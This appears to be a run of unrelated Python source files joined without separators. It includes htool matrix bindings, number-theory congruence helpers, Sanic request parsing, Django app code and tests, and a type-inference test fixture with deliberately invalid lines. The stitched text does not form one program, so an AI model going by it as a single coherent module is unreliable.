        assert self.shape[1] == vector.shape[0], "Matrix-vector product of matrices of wrong shapes."

        # Boilerplate for Python/C++ interface
        self.lib.MultiHMatrixVecProd.argtypes = [
                ctypes.POINTER(_C_MultiHMatrix),
                ctypes.c_int,
                np.ctypeslib.ndpointer(self.dtype, flags='C_CONTIGUOUS'),
                np.ctypeslib.ndpointer(self.dtype, flags='C_CONTIGUOUS')
                ]

        # Initialize vector
        result = np.zeros((self.shape[0],), dtype=self.dtype)

        # Call C++ backend
        self.lib.MultiHMatrixVecProd(self.c_data,l , vector, result)
        return result


class MultiHMatrix(AbstractMultiHMatrix):
    """A real-valued hierarchical matrix based on htool C++ library.
    Create with HMatrix.from_coefs or HMatrix.from_submatrices.

    Attributes
    ----------
    c_data:
        Pointer to the raw data used by the C++ library.
    shape: Tuple[int, int]
        Shape of the matrix.
    nb_dense_blocks: int
        Number of dense blocks in the hierarchical matrix.
    nb_low_rank_blocks: int
        Number of sparse blocks in the hierarchical matrix.
    nb_blocks: int
        Total number of blocks in the decomposition.
    params: dict
        The parameters that have been used to build the matrix.
    """
    libfile = os.path.join(os.path.dirname(__file__), '../libhtool_shared')
    if 'linux' in sys.platform:
        lib = ctypes.cdll.LoadLibrary(libfile+'.so')
    elif sys.platform == 'darwin':
        lib = ctypes.cdll.LoadLibrary(libfile+'.dylib')
    elif sys.platform == 'win32':
        lib = ctypes.cdll.LoadLibrary(libfile+'.dll')
    dtype = ctypes.c_double


class ComplexMultiHMatrix(AbstractMultiHMatrix):
    """A complex-valued hierarchical matrix based on htool C++ library.
    Create with ComplexHMatrix.from_coefs or ComplexHMatrix.from_submatrices.

    Attributes
    ----------
    c_data:
        Pointer to the raw data used by the C++ library.
    shape: Tuple[int, int]
        Shape of the matrix.
    nb_dense_blocks: int
        Number of dense blocks in the hierarchical matrix.
    nb_low_rank_blocks: int
        Number of sparse blocks in the hierarchical matrix.
    nb_blocks: int
        Total number of blocks in the decomposition.
    params: dict
        The parameters that have been used to build the matrix.
    """
    libfile = os.path.join(os.path.dirname(__file__), '../libhtool_shared_complex')
    if 'linux' in sys.platform:
        lib = ctypes.cdll.LoadLibrary(libfile+'.so')
    elif sys.platform == 'darwin':
        lib = ctypes.cdll.LoadLibrary(libfile+'.dylib')
    elif sys.platform == 'win32':
        lib = ctypes.cdll.LoadLibrary(libfile+'.dll')
    dtype = np.complex128


import primes as py

def lcm(a, b):
        return a * b / gcd(a, b)
 
def gcd(a, b):
    while b != 0:
        (a, b) = (b, a % b)
    return a

# Returns two integers x, y such that gcd(a, b) = ax + by
def egcd(a, b):
    if a == 0:
        return (0, 1)
    else:
        y, x = egcd(b % a, a)
        return (x - (b // a) * y, y)

# Returns an integer x such that ax = 1(mod m)
def modInverse(a, m):
    x, y = egcd(a, m)
    if gcd(a, m) == 1:
        return x % m

# Reduces linear congruence to form x = b(mod m)
def reduceCongr(a, b, m):
        gcdAB = gcd(a, b)
        a /= gcdAB
        b /= gcdAB
        m /= gcd(gcdAB, m)
        modinv = modInverse(a, m)
        b *= modinv
        return (1, b, m)
        
# Returns the incongruent solutions to the linear congruence ax = b(mod m)
def linCongr(a, b, m):
        solutions = set()
        if (b % gcd(a, m) == 0):
                numSols = gcd(a, m)
                sol = (b * egcd(a, m)[0] / numSols) % m
                for i in xrange(0, numSols):
                        solutions.add((sol + m * i / numSols) % m)
        return solutions

# Uses the Chinese Remainder Theorem to solve a system of linear congruences
def crt(congruences):
        x = 0
        M = 1
        for i in xrange(len(congruences)):
                M *= congruences[i][2]
                congruences[i] = reduceCongr(congruences[i][0], congruences[i][1], congruences[i][2])

        for j in xrange(len(congruences)):
                m = congruences[j][2]
                if gcd(m, M/m) != 1:
                        return None
                x += congruences[j][1] * modInverse(M/m, m) * M / m

        return x % M

# Returns the incongruent solution to any system of linear congruences
def linCongrSystem(congruences):
        newCongruences = []
        for i in xrange(len(congruences)):
                congruences[i] = reduceCongr(congruences[i][0], congruences[i][1], congruences[i][2])
                
                # Tests to see whether the system is solvable
                for j in xrange(len(congruences)):
                        if congruences[i] != congruences[j]:
                                if (congruences[i][1] - congruences[j][1]) % gcd(congruences[i][2], congruences[j][2]) != 0:
                                        return None
                
                # Splits moduli into prime powers
                pFactor = py.primeFactorization(congruences[i][2])
                for term in pFactor:
                        newCongruences.append((1, congruences[i][1], term[0] ** term[1]))

        # Discards redundant congruences
        newCongruences = sorted(newCongruences, key=lambda x: x[2], reverse = True)
        finalCongruences = []
        for k in xrange(len(newCongruences)):
                isRedundant = False
                for l in xrange(0, k):
                        if newCongruences[l][2] % newCongruences[k][2] == 0:
                                isRedundant = True
                if not isRedundant:
                        finalCongruences.append(newCongruences[k])

        return crt(finalCongruences)

# Returns incongruents solutions to a polynomial congruence
def polyCongr(coefficients, m):
        solutions = []
        for i in xrange(m):
                value = 0
                for degree in xrange(len(coefficients)):
                        value += coefficients[degree] * (i ** (len(coefficients) - degree - 1))
                if value % m == 0:
                        solutions.append(i)

        return solutions



a = a # e 4
a = 1       # 0 int
l = [a]     # 0 [int]
d = {a:l}   # 0 {int:[int]}

s = "abc"
c = ord(s[2].lower()[0]) # 0 int # 4 (str) -> int
l2 = [range(i) for i in d] # 0 [[int]]

y = [(a,b) for a,b in {1:'2'}.iteritems()] # 0 [(int,str)]

b = 1 # 0 int
if 0:
    b = '' # 4 str
else:
    b = str(b) # 4 str # 12 int

r = 0 # 0 int
if r: # 3 int
    r = str(r) # 4 str # 12 int
r # 0 <int|str>

l = range(5) # 0 [int]
l2 = l[2:3] # 0 [int]
x = l2[1] # 0 int

k = 1() # 0 <unknown> # e 4

del k
k # e 0

l = [] # 0 [int]
x = 1 # 0 int
while x: # 6 int
    l = [] # 4 [int]
l.append(1) # 0 [int] # 2 (int) -> None

l = [1, 2] # 0 [int]
l2 = [x for x in l] # 0 [<int|str>]
l2.append('') # 0 [<int|str>]

s = str() # 0 str
s2 = str(s) # 0 str
s3 = repr() # e 5 # 0 str
s4 = repr(s) # 0 str

x = 1 if [] else '' # 0 <int|str>

l = [1] # 0 [<int|str>]
l2 = [''] # 0 [str]
l[:] = l2 # 0 [<int|str>]

b = 1 < 2 < 3 # 0 bool

l = sorted(range(5), key=lambda x:-x) # 0 [int]

d = {} # 0 {<bool|int>:<int|str>}
d1 = {1:''} # 0 {int:str}
d.update(d1)
d[True] = 1
d # 0 {<bool|int>:<int|str>}

l = [] # 0 [int]
l1 = [] # 0 [<unknown>]
l.extend(l1)
l.append(2)

l = [] # 0 [<[str]|int>]
l1 = [[]] # 0 [[str]]
l.extend(l1)
l[0].append('') # e 0
l.append(1)

l = [] # 0 [[<int|str>]]
l2 = [1] # 0 [int]
l3 = [''] # 0 [str]
l.append(l2)
l.append(l3)

for i, s in enumerate("aoeu"): # 4 int # 7 str
    pass

x = 1 # 0 int
y = x + 1.0 # 0 float
y << 1 # e 0
l = [1, 1.0] # 0 [float]
1.0 in [1] # e 0

x = `1` # 0 str
def f():
    x = `1` # 4 str

d = dict(a=1) # 0 {str:int}
l = list() # 0 [<unknown>]

i = int(1) # 0 int
i = int(1.2) # 0 int
i = abs(1) # 0 int
i = abs(1.0) # 0 float

d = dict() # 0 {int:int}
d[1] = 2
d2 = dict(d) # 0 {<int|str>:<int|str>}
d2[''] = ''
d3 = dict([(1,2)]) # 0 {int:int}
d4 = dict(a=1) # 0 {str:int}

# Copyright (c) 2016 nVentiveUX
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

"""Application configuration"""

from django.apps import AppConfig


class ShowcaseConfig(AppConfig):
    name = 'mystartupmanager.showcase'

import asyncio
import email.utils
import json
import sys

from cgi import parse_header
from collections import namedtuple
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, unquote, urlunparse

from httptools import parse_url

from sanic.exceptions import InvalidUsage
from sanic.log import error_logger, logger


try:
    from ujson import loads as json_loads
except ImportError:
    if sys.version_info[:2] == (3, 5):

        def json_loads(data):
            # on Python 3.5 json.loads only supports str not bytes
            return json.loads(data.decode())

    else:
        json_loads = json.loads


DEFAULT_HTTP_CONTENT_TYPE = "application/octet-stream"


# HTTP/1.1: https://www.w3.org/Protocols/rfc2616/rfc2616-sec7.html#sec7.2.1
# > If the media type remains unknown, the recipient SHOULD treat it
# > as type "application/octet-stream"


class RequestParameters(dict):
    """Hosts a dict with lists as values where get returns the first
    value of the list and getlist returns the whole shebang
    """

    def get(self, name, default=None):
        """Return the first value, either the default or actual"""
        return super().get(name, [default])[0]

    def getlist(self, name, default=None):
        """Return the entire list"""
        return super().get(name, default)


class StreamBuffer:
    def __init__(self, buffer_size=100):
        self._queue = asyncio.Queue(buffer_size)

    async def read(self):
        """ Stop reading when gets None """
        payload = await self._queue.get()
        self._queue.task_done()
        return payload

    async def put(self, payload):
        await self._queue.put(payload)

    def is_full(self):
        return self._queue.full()


class Request(dict):
    """Properties of an HTTP request such as URL, headers, etc."""

    __slots__ = (
        "__weakref__",
        "_cookies",
        "_ip",
        "_parsed_url",
        "_port",
        "_remote_addr",
        "_socket",
        "app",
        "body",
        "endpoint",
        "headers",
        "method",
        "parsed_args",
        "parsed_files",
        "parsed_form",
        "parsed_json",
        "raw_url",
        "stream",
        "transport",
        "uri_template",
        "version",
    )

    def __init__(self, url_bytes, headers, version, method, transport):
        self.raw_url = url_bytes
        # TODO: Content-Encoding detection
        self._parsed_url = parse_url(url_bytes)
        self.app = None

        self.headers = headers
        self.version = version
        self.method = method
        self.transport = transport

        # Init but do not inhale
        self.body_init()
        self.parsed_json = None
        self.parsed_form = None
        self.parsed_files = None
        self.parsed_args = None
        self.uri_template = None
        self._cookies = None
        self.stream = None
        self.endpoint = None

    def __repr__(self):
        return "<{0}: {1} {2}>".format(
            self.__class__.__name__, self.method, self.path
        )

    def __bool__(self):
        if self.transport:
            return True
        return False

    def body_init(self):
        self.body = []

    def body_push(self, data):
        self.body.append(data)

    def body_finish(self):
        self.body = b"".join(self.body)

    @property
    def json(self):
        if self.parsed_json is None:
            self.load_json()

        return self.parsed_json

    def load_json(self, loads=json_loads):
        try:
            self.parsed_json = loads(self.body)
        except Exception:
            if not self.body:
                return None
            raise InvalidUsage("Failed when parsing body as json")

        return self.parsed_json

    @property
    def token(self):
        """Attempt to return the auth header token.

        :return: token related to request
        """
        prefixes = ("Bearer", "Token")
        auth_header = self.headers.get("Authorization")

        if auth_header is not None:
            for prefix in prefixes:
                if prefix in auth_header:
                    return auth_header.partition(prefix)[-1].strip()

        return auth_header

    @property
    def form(self):
        if self.parsed_form is None:
            self.parsed_form = RequestParameters()
            self.parsed_files = RequestParameters()
            content_type = self.headers.get(
                "Content-Type", DEFAULT_HTTP_CONTENT_TYPE
            )
            content_type, parameters = parse_header(content_type)
            try:
                if content_type == "application/x-www-form-urlencoded":
                    self.parsed_form = RequestParameters(
                        parse_qs(self.body.decode("utf-8"))
                    )
                elif content_type == "multipart/form-data":
                    # TODO: Stream this instead of reading to/from memory
                    boundary = parameters["boundary"].encode("utf-8")
                    self.parsed_form, self.parsed_files = parse_multipart_form(
                        self.body, boundary
                    )
            except Exception:
                error_logger.exception("Failed when parsing form")

        return self.parsed_form

    @property
    def files(self):
        if self.parsed_files is None:
            self.form  # compute form to get files

        return self.parsed_files

    @property
    def args(self):
        if self.parsed_args is None:
            if self.query_string:
                self.parsed_args = RequestParameters(
                    parse_qs(self.query_string)
                )
            else:
                self.parsed_args = RequestParameters()
        return self.parsed_args

    @property
    def raw_args(self):
        return {k: v[0] for k, v in self.args.items()}

    @property
    def cookies(self):
        if self._cookies is None:
            cookie = self.headers.get("Cookie")
            if cookie is not None:
                cookies = SimpleCookie()
                cookies.load(cookie)
                self._cookies = {
                    name: cookie.value for name, cookie in cookies.items()
                }
            else:
                self._cookies = {}
        return self._cookies

    @property
    def ip(self):
        if not hasattr(self, "_socket"):
            self._get_address()
        return self._ip

    @property
    def port(self):
        if not hasattr(self, "_socket"):
            self._get_address()
        return self._port

    @property
    def socket(self):
        if not hasattr(self, "_socket"):
            self._get_address()
        return self._socket

    def _get_address(self):
        self._socket = self.transport.get_extra_info("peername") or (
            None,
            None,
        )
        self._ip = self._socket[0]
        self._port = self._socket[1]

    @property
    def remote_addr(self):
        """Attempt to return the original client ip based on X-Forwarded-For.

        :return: original client ip.
        """
        if not hasattr(self, "_remote_addr"):
            forwarded_for = self.headers.get("X-Forwarded-For", "").split(",")
            remote_addrs = [
                addr
                for addr in [addr.strip() for addr in forwarded_for]
                if addr
            ]
            if len(remote_addrs) > 0:
                self._remote_addr = remote_addrs[0]
            else:
                self._remote_addr = ""
        return self._remote_addr

    @property
    def scheme(self):
        if (
            self.app.websocket_enabled
            and self.headers.get("upgrade") == "websocket"
        ):
            scheme = "ws"
        else:
            scheme = "http"

        if self.transport.get_extra_info("sslcontext"):
            scheme += "s"

        return scheme

    @property
    def host(self):
        # it appears that httptools doesn't return the host
        # so pull it from the headers
        return self.headers.get("Host", "")

    @property
    def content_type(self):
        return self.headers.get("Content-Type", DEFAULT_HTTP_CONTENT_TYPE)

    @property
    def match_info(self):
        """return matched info after resolving route"""
        return self.app.router.get(self)[2]

    @property
    def path(self):
        return self._parsed_url.path.decode("utf-8")

    @property
    def query_string(self):
        if self._parsed_url.query:
            return self._parsed_url.query.decode("utf-8")
        else:
            return ""

    @property
    def url(self):
        return urlunparse(
            (self.scheme, self.host, self.path, None, self.query_string, None)
        )


File = namedtuple("File", ["type", "body", "name"])


def parse_multipart_form(body, boundary):
    """Parse a request body and returns fields and files

    :param body: bytes request body
    :param boundary: bytes multipart boundary
    :return: fields (RequestParameters), files (RequestParameters)
    """
    files = RequestParameters()
    fields = RequestParameters()

    form_parts = body.split(boundary)
    for form_part in form_parts[1:-1]:
        file_name = None
        content_type = "text/plain"
        content_charset = "utf-8"
        field_name = None
        line_index = 2
        line_end_index = 0
        while not line_end_index == -1:
            line_end_index = form_part.find(b"\r\n", line_index)
            form_line = form_part[line_index:line_end_index].decode("utf-8")
            line_index = line_end_index + 2

            if not form_line:
                break

            colon_index = form_line.index(":")
            form_header_field = form_line[0:colon_index].lower()
            form_header_value, form_parameters = parse_header(
                form_line[colon_index + 2 :]
            )

            if form_header_field == "content-disposition":
                field_name = form_parameters.get("name")
                file_name = form_parameters.get("filename")

                # non-ASCII filenames in RFC2231, "filename*" format
                if file_name is None and form_parameters.get("filename*"):
                    encoding, _, value = email.utils.decode_rfc2231(
                        form_parameters["filename*"]
                    )
                    file_name = unquote(value, encoding=encoding)
            elif form_header_field == "content-type":
                content_type = form_header_value
                content_charset = form_parameters.get("charset", "utf-8")

        if field_name:
            post_data = form_part[line_index:-4]
            if file_name is None:
                value = post_data.decode(content_charset)
                if field_name in fields:
                    fields[field_name].append(value)
                else:
                    fields[field_name] = [value]
            else:
                form_file = File(
                    type=content_type, name=file_name, body=post_data
                )
                if field_name in files:
                    files[field_name].append(form_file)
                else:
                    files[field_name] = [form_file]
        else:
            logger.debug(
                "Form-data field does not have a 'name' parameter "
                "in the Content-Disposition header"
            )

    return fields, files

from .tile import Split, Stack, TileStack


class Tile(Split):

    class left(Stack):
        weight = 3
        priority = 0
        limit = 1

    class right(TileStack):
        pass


class Max(Split):

    class main(Stack):
        tile = False


class InstantMsg(Split):

    class left(TileStack): # or maybe not tiled ?
        weight = 3

    class roster(Stack):
        limit = 1
        priority = 0  # probably roster created first


class Gimp(Split):

    class toolbox(Stack):
        limit = 1
        size = 184

    class main(Stack):
        weight = 4
        priority = 0

    class dock(Stack):
        limit = 1
        size = 324

hmm = [
    "https://media3.giphy.com/media/TPl5N4Ci49ZQY/giphy.gif",
    "https://media0.giphy.com/media/l14qxlCgJ0zUk/giphy.gif",
    "https://media4.giphy.com/media/MsWnkCVSXz73i/giphy.gif",
    "https://media1.giphy.com/media/l2JJEIMLgrXPEbDGM/giphy.gif",
    "https://media0.giphy.com/media/dgK22exekwOLm/giphy.gif"
]
from djblets.cache.backend import cache_memoize


class BugTracker(object):
    """An interface to a bug tracker.

    BugTracker subclasses are used to enable interaction with different
    bug trackers.
    """
    def get_bug_info(self, repository, bug_id):
        """Get the information for the specified bug.

        This should return a dictionary with 'summary', 'description', and
        'status' keys.

        This is cached for 60 seconds to reduce the number of queries to the
        bug trackers and make things seem fast after the first infobox load,
        but is still a short enough time to give relatively fresh data.
        """
        return cache_memoize(self.make_bug_cache_key(repository, bug_id),
                             lambda: self.get_bug_info_uncached(repository,
                                                                bug_id),
                             expiration=60)

    def get_bug_info_uncached(self, repository, bug_id):
        """Get the information for the specified bug (implementation).

        This should be implemented by subclasses, and should return a
        dictionary with 'summary', 'description', and 'status' keys.
        If any of those are unsupported by the given bug tracker, the unknown
        values should be given as an empty string.
        """
        return {
            'summary': '',
            'description': '',
            'status': '',
        }

    def make_bug_cache_key(self, repository, bug_id):
        """Returns a key to use when caching fetched bug information."""
        return 'repository-%s-bug-%s' % (repository.pk, bug_id)

import sys
from stack import Stack


def parse_expression_into_parts(expression):
    """
    Parse expression into list of parts
    :rtype : list
    :param expression: str # i.e. "2 * 3 + ( 2 - 3 )"
    """
    raise NotImplementedError("complete me!")


def evaluate_expression(a, b, op):
    raise NotImplementedError("complete me!")


def evaluate_postfix(parts):
    raise NotImplementedError("complete me!")


if __name__ == "__main__":
    expr = None
    if len(sys.argv) > 1:
        expr = sys.argv[1]
        parts = parse_expression_into_parts(expr)
        print "Evaluating %s == %s" % (expr, evaluate_postfix(parts))
    else:
        print 'Usage: python postfix.py "<expr>" -- i.e. python postfix.py "9 1 3 + 2 * -"'
        print "Spaces are required between every term."

#!/usr/bin/python
# -*- coding: utf-8 -*-
# @author victor li nianchaoli@msn.cn
# @date 2015/10/07

import baseHandler

class MainHandler(baseHandler.RequestHandler):

    def get(self):
        self.redirect('/posts/last')

from ab_tool.tests.common import (SessionTestCase, TEST_COURSE_ID,
    TEST_OTHER_COURSE_ID, NONEXISTENT_TRACK_ID, NONEXISTENT_EXPERIMENT_ID,
    APIReturn, LIST_MODULES)
from django.core.urlresolvers import reverse
from ab_tool.models import (Experiment, InterventionPointUrl)
from ab_tool.exceptions import (EXPERIMENT_TRACKS_ALREADY_FINALIZED,
    NO_TRACKS_FOR_EXPERIMENT, UNAUTHORIZED_ACCESS,
    INTERVENTION_POINTS_ARE_INSTALLED)
import json
from mock import patch

class TestExperimentPages(SessionTestCase):
    """ Tests related to Experiment and Experiment pages and methods """
    
    def test_create_experiment_view(self):
        """ Tests edit_experiment template renders for url 'create_experiment' """
        response = self.client.get(reverse("ab_testing_tool_create_experiment"))
        self.assertOkay(response)
        self.assertTemplateUsed(response, "ab_tool/edit_experiment.html")
    
    def test_create_experiment_view_unauthorized(self):
        """ Tests edit_experiment template does not render for url 'create_experiment'
            when unauthorized """
        self.set_roles([])
        response = self.client.get(reverse("ab_testing_tool_create_experiment"), follow=True)
        self.assertTemplateNotUsed(response, "ab_tool/create_experiment.html")
        self.assertTemplateUsed(response, "ab_tool/not_authorized.html")
    
    def test_edit_experiment_view(self):
        """ Tests edit_experiment template renders when authenticated """
        experiment = self.create_test_experiment()
        response = self.client.get(reverse("ab_testing_tool_edit_experiment", args=(experiment.id,)))
        self.assertTemplateUsed(response, "ab_tool/edit_experiment.html")
    
    def test_edit_experiment_view_started_experiment(self):
        """ Tests edit_experiment template renders when experiment has started """
        experiment = self.create_test_experiment()
        experiment.tracks_finalized = True
        experiment.save()
        response = self.client.get(reverse("ab_testing_tool_edit_experiment", args=(experiment.id,)))
        self.assertTemplateUsed(response, "ab_tool/edit_experiment.html")
    
    def test_edit_experiment_view_with_tracks_weights(self):
        """ Tests edit_experiment template renders properly with track weights """
        experiment = self.create_test_experiment()
        experiment.assignment_method = Experiment.WEIGHTED_PROBABILITY_RANDOM
        track1 = self.create_test_track(name="track1", experiment=experiment)
        track2 = self.create_test_track(name="track2", experiment=experiment)
        self.create_test_track_weight(experiment=experiment, track=track1)
        self.create_test_track_weight(experiment=experiment, track=track2)
        response = self.client.get(reverse("ab_testing_tool_edit_experiment", args=(experiment.id,)))
        self.assertTemplateUsed(response, "ab_tool/edit_experiment.html")
    
    def test_edit_experiment_view_unauthorized(self):
        """ Tests edit_experiment template doesn't render when unauthorized """
        self.set_roles([])
        experiment = self.create_test_experiment(course_id=TEST_OTHER_COURSE_ID)
        response = self.client.get(reverse("ab_testing_tool_edit_experiment", args=(experiment.id,)),
                                   follow=True)
        self.assertTemplateNotUsed(response, "ab_tool/edit_experiment.html")
        self.assertTemplateUsed(response, "ab_tool/not_authorized.html")
    
    def test_edit_experiment_view_nonexistent(self):
        """Tests edit_experiment when experiment does not exist"""
        e_id = NONEXISTENT_EXPERIMENT_ID
        response = self.client.get(reverse("ab_testing_tool_edit_experiment", args=(e_id,)))
        self.assertTemplateNotUsed(response, "ab_tool/edit_experiment.html")
        self.assertEquals(response.status_code, 404)
    
    def test_edit_experiment_view_wrong_course(self):
        """ Tests edit_experiment when attempting to access a experiment from a different course """
        experiment = self.create_test_experiment(course_id=TEST_OTHER_COURSE_ID)
        response = self.client.get(reverse("ab_testing_tool_edit_experiment", args=(experiment.id,)))
        self.assertError(response, UNAUTHORIZED_ACCESS)

    def test_edit_experiment_view_last_modified_updated(self):
        """ Tests edit_experiment to confirm that the last updated timestamp changes """
        experiment = self.create_test_experiment()
        experiment.name += " (updated)"
        response = self.client.post(reverse("ab_testing_tool_submit_edit_experiment",
                                            args=(experiment.id,)),
                                    content_type="application/json",
                                    data=experiment.to_json())
        self.assertEquals(response.content, "success")
        updated_experiment = Experiment.objects.get(id=experiment.id)
        self.assertLess(experiment.updated_on, updated_experiment.updated_on,
                        response)

    
    def test_submit_create_experiment(self):
        """ Tests that create_experiment creates a Experiment object verified by
            DB count when uniformRandom is true"""
        Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        num_experiments = Experiment.objects.count()
        experiment = {
                "name": "experiment", "notes": "hi", "uniformRandom": True,
                "csvUpload": False,
                "tracks": [{"id": None, "weighting": None, "name": "A"}]
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_create_experiment"), follow=True,
            content_type="application/json", data=json.dumps(experiment)
        )
        self.assertEquals(num_experiments + 1, Experiment.objects.count(), response)

    def test_submit_create_experiment_csv_upload(self):
        """ Tests that create_experiment creates a Experiment object verified by
            DB count when csvUpload is True and no track weights are specified"""
        Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        num_experiments = Experiment.objects.count()
        experiment = {
                "name": "experiment", "notes": "hi", "uniformRandom": False,
                "csvUpload": True,
                "tracks": [{"id": None, "name": "A"}]
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_create_experiment"), follow=True,
            content_type="application/json", data=json.dumps(experiment)
        )
        self.assertEquals(num_experiments + 1, Experiment.objects.count(), response)

    def test_submit_create_experiment_with_weights_as_assignment_method(self):
        """ Tests that create_experiment creates a Experiment object verified by
            DB count when uniformRandom is false and the tracks have weightings """
        Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        num_experiments = Experiment.objects.count()
        experiment = {
                "name": "experiment", "notes": "hi", "uniformRandom": False,
                "csvUpload": False,
                "tracks": [{"id": None, "weighting": 100, "name": "A"}]
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_create_experiment"), follow=True,
            content_type="application/json", data=json.dumps(experiment)
        )
        self.assertEquals(num_experiments + 1, Experiment.objects.count(), response)
    
    def test_submit_create_experiment_unauthorized(self):
        """Tests that create_experiment creates a Experiment object verified by DB count"""
        self.set_roles([])
        Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        num_experiments = Experiment.objects.count()
        experiment = {"name": "experiment", "notes": "hi"}
        response = self.client.post(
            reverse("ab_testing_tool_submit_create_experiment"), follow=True,
            content_type="application/json", data=json.dumps(experiment)
        )
        self.assertEquals(num_experiments, Experiment.objects.count())
        self.assertTemplateUsed(response, "ab_tool/not_authorized.html")
    
    def test_submit_edit_experiment(self):
        """ Tests that submit_edit_experiment does not change DB count but does change Experiment
            attribute"""
        experiment = self.create_test_experiment(name="old_name")
        experiment_id = experiment.id
        num_experiments = Experiment.objects.count()
        experiment = {
                "name": "new_name", "notes": "hi", "uniformRandom": True,
                "csvUpload": False,
                "tracks": [{"id": None, "weighting": None, "name": "A"}]
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment_id,)),
            follow=True, content_type="application/json", data=json.dumps(experiment)
        )
        self.assertOkay(response)
        self.assertEquals(num_experiments, Experiment.objects.count())
        experiment = Experiment.objects.get(id=experiment_id)
        self.assertEquals(experiment.name, "new_name")
    
    def test_submit_edit_experiment_changes_assignment_method_to_weighted(self):
        """ Tests that submit_edit_experiment changes an Experiment's assignment
            method from uniform (default) to weighted"""
        experiment = self.create_test_experiment(name="old_name")
        experiment_id = experiment.id
        num_experiments = Experiment.objects.count()
        no_track_weights = experiment.track_probabilites.count()
        experiment = {
                "name": "new_name", "notes": "hi", "uniformRandom": False,
                "csvUpload": False,
                "tracks": [{"id": None, "weighting": 20, "name": "A"},
                           {"id": None, "weighting": 80, "name": "B"}]
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment_id,)),
            follow=True, content_type="application/json", data=json.dumps(experiment)
        )
        self.assertOkay(response)
        self.assertEquals(num_experiments, Experiment.objects.count())
        experiment = Experiment.objects.get(id=experiment_id)
        self.assertEquals(experiment.assignment_method, Experiment.WEIGHTED_PROBABILITY_RANDOM)
        self.assertEquals(experiment.track_probabilites.count(), no_track_weights + 2)
    
    def test_submit_edit_experiment_changes_assignment_method_to_uniform(self):
        """ Tests that submit_edit_experiment changes an Experiment's assignment
            method from weighted uniform """
        experiment = self.create_test_experiment(
                name="old_name", assignment_method=Experiment.WEIGHTED_PROBABILITY_RANDOM)
        experiment_id = experiment.id
        num_experiments = Experiment.objects.count()
        no_tracks = experiment.tracks.count()
        experiment = {
                "name": "new_name", "notes": "hi", "uniformRandom": True,
                "csvUpload": False,
                "tracks": [{"id": None, "weighting": None, "name": "A"},
                           {"id": None, "weighting": None, "name": "B"},
                           {"id": None, "weighting": None, "name": "C"}]
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment_id,)),
            follow=True, content_type="application/json", data=json.dumps(experiment)
        )
        self.assertOkay(response)
        self.assertEquals(num_experiments, Experiment.objects.count())
        experiment = Experiment.objects.get(id=experiment_id)
        self.assertEquals(experiment.assignment_method, Experiment.UNIFORM_RANDOM)
        self.assertEquals(experiment.tracks.count(), no_tracks + 3)
    
    def test_submit_edit_experiment_unauthorized(self):
        """ Tests submit_edit_experiment when unauthorized"""
        self.set_roles([])
        experiment = self.create_test_experiment(name="old_name")
        experiment_id = experiment.id
        experiment = {"name": "new_name", "notes": ""}
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment_id,)),
            content_type="application/json", data=json.dumps(experiment), follow=True
        )
        self.assertTemplateUsed(response, "ab_tool/not_authorized.html")
    
    def test_submit_edit_experiment_nonexistent(self):
        """ Tests that submit_edit_experiment method raises error for non-existent Experiment """
        experiment_id = NONEXISTENT_EXPERIMENT_ID
        experiment = {"name": "new_name", "notes": ""}
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment_id,)),
            content_type="application/json", data=json.dumps(experiment)
        )
        self.assertEquals(response.status_code, 404)
    
    def test_submit_edit_experiment_wrong_course(self):
        """ Tests that submit_edit_experiment method raises error for existent Experiment but
            for wrong course"""
        experiment = self.create_test_experiment(name="old_name",
                                       course_id=TEST_OTHER_COURSE_ID)
        data = {"name": "new_name", "notes": ""}
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment.id,)),
            content_type="application/json", data=json.dumps(data)
        )
        self.assertError(response, UNAUTHORIZED_ACCESS)
    
    def test_submit_edit_started_experiment_changes_name_and_notes(self):
        """ Tests that submit_edit_experiment changes an Experiment's
            name and notes and track names only if the experiment has already been started """
        experiment = self.create_test_experiment(name="old_name", notes="old_notes",
                                                 tracks_finalized=True)
        experiment_id = experiment.id
        num_experiments = Experiment.objects.count()
        old_track = self.create_test_track(experiment=experiment, name="old_name_track")
        experiment_json = {
                "name": "new_name", "notes": "new_notes", "tracks": [{"id": old_track.id,
                  "name": "new_track_name"}],
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment_id,)),
            follow=True, content_type="application/json", data=json.dumps(experiment_json)
        )
        self.assertOkay(response)
        self.assertEquals(num_experiments, Experiment.objects.count())
        experiment = Experiment.objects.get(id=experiment_id)
        self.assertEquals(experiment.name, "new_name")
        self.assertEquals(experiment.notes, "new_notes")
        self.assertEquals(experiment.tracks.all()[0].name, "new_track_name")
    
    def test_submit_edit_started_experiment_does_not_change_tracks(self):
        """ Tests that submit_edit_experiment doesn't change tracks for
            an experiment that has already been started """
